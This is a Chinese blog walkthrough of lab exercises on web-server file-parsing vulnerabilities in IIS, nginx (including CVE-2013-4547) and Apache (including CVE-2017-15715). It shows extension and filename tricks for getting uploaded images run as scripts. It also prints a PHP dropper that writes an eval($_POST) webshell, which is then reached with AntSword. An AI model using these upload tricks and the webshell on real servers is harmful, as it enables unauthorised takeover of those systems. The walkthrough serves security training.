文件解析漏洞靶场攻略

一.IIS6.X(iis)

目录解析

1.在根目录下新建一个1.asp的文件夹。

2.在1.asp文件夹中新建一个文本文档

内容为:<% =now %>

3.使用ipconfig查询计算机ip

4.使用物理机访问http://192.168.124.153/1.asp/1.txt

看到1.txt中的文件被当作asp文件执行。

畸形文件解析

1.在根目录下新建一个1.asp;.txt文件。

2.发现txt文件被当作asp文件执行。

二.IIS7.X(iis)

1.启动phpstudy for iis

2.在iis管理器启动对应网站并浏览。

3.成功打开网站。

4.在对应的www目录下新建一个jpg文件

内容为:<?php phpinfo();?>

5.在网页中访问1.jpg文件,发现可以访问成功。

6.在结尾添加/.php,发现文件中的php代码成功执行

三.nginx_parsing(nginx)

1.使用如下命令打开靶场

2.新建一个1.jpg,写入一句话木马。

3.在网页中访问,显示访问成功。

4.访问图片路径,发现图片存在。

5.在jpg后面添加/.php访问,发现木马执行成功。

6.复制文件绝对路径,使用蚁剑连接

7.连接成功。

四.CVE-2013-4547(nginx)

1.使用以下名命令连接靶场

2.直接提交php文件失败

3.将文件名改为jpg抓个包看一下

4.在jpg后面加空格空格.php,hex中改20为00

5.放行,文件上传成功。

6.因为上传的文件会进行编码,使用继续抓包修改

5.放行,访问成功

6.由于不符合连接的条件,因此我们需要把脚本文件改为:

GIF89a
<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

访问同级目录下的webshell.php

访问成功,说明木马写进去了

7.连接蚁剑。

五.apache_parsing(apache)

1.使用如下命令连接靶场

2.上传1.php.jpg文件

3.上传成功,得到木马文件路径

4.访问木马文件,说明木马植入成功

5.按照连接蚁剑的步骤连接。

六.CVE-2017-15715(apache)

1.使用以下命令连接靶场

发现报错原因为端口占用

使用vim命令修改文件中的端口信息

2.上传1.jpg并进行抓包

在evil.php后加空格

2.将20改为0a

3.放行,页面正常说明木马上传成功

4.访问evil.php%0a访问木马文件

5.得到木马绝对路径,使用蚁剑连接。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值